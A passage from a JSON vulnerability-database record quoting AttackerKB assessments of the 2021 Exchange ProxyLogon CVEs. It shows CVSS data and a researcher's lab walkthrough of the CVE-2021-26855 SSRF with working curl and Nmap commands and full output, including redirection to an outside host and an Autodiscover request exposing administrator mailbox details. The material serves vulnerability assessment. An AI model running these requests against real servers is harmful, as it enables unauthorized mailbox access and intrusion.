\t\t\ttypeof(List<ValidationError>),\n \t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n \t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n \t\t\ttypeof(StoreObjectId),\n 
\t\t\ttypeof(StoreObjectType),\n \t\t\ttypeof(EntryIdProvider),\n \t\t\ttypeof(SimpleContactInfoBase),\n \t\t\ttypeof(MultipleResolvedContactInfo),\n \t\t\ttypeof(CallerNameDisplayContactInfo),\n \t\t\ttypeof(PersonalContactInfo),\n \t\t\ttypeof(DefaultContactInfo),\n \t\t\ttypeof(UMDialPlan),\n \t\t\ttypeof(UMEnabledFlags),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n \t\t\ttypeof(DialByNamePrimaryEnum),\n \t\t\ttypeof(DialByNameSecondaryEnum),\n \t\t\ttypeof(AudioCodecEnum),\n \t\t\ttypeof(UMUriType),\n \t\t\ttypeof(UMSubscriberType),\n \t\t\ttypeof(UMGlobalCallRoutingScheme),\n \t\t\ttypeof(UMVoIPSecurityType),\n \t\t\ttypeof(SystemFlagsEnum),\n \t\t\ttypeof(EumProxyAddress),\n \t\t\ttypeof(EumProxyAddressPrefix)\n \t\t};\n [snip]\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26857", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "href": "https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T17:15:35", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. 
My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * 
Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 
2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: 
X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate 
verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a 
href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * 
TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" 
href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. 
For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. 
A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * 
Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n 
<Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n 
